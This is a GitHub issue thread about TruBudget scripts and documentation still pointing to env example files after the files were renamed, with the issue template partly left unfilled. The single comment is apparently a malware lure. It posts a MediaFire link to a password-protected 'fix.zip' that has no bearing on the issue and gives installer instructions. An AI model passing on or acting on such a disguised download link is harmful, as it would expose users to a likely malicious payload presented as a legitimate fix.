### ISSUE TITLE
Scripts and documentation using env_example don't work

### ISSUE THREAD

**Issue by SamuelPull** [openkfw/TruBudget#1956]
- [x] I have searched the [issues](https://github.com/openkfw/TruBudget/issues) of this repository and believe that this is not a duplicate.

## Description 😯

Files with default/example environmental variables were renamed env_example -> env.example. 
Not all scripts and documentation files were updated. For example, when starting a TB without .env file, user is given an option to automatically copy env_example to env file, but that fails.

Update scripts and documentation to reflect the renamed env example files.

### How to reproduce 🕹

1. <E.g. login as user XYZ>
2. <E.g. try to create new subproject>
3. <E.g. You will see error in console>
4. ...

### Screenshots 📷

Add screenshots or screen recording video if applicable.

## Your Environment 🌎

| Tech            | Version |
| --------------- | ------- |
| Frontend        | v2.?.?  |
| API             | v2.?.?  |
| Blockchain      | v2.?.?  |
| Export-Service  | v2.?.?  |
| Email-Service   | v2.?.?  |
| Storage-Service | v2.?.?  |

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
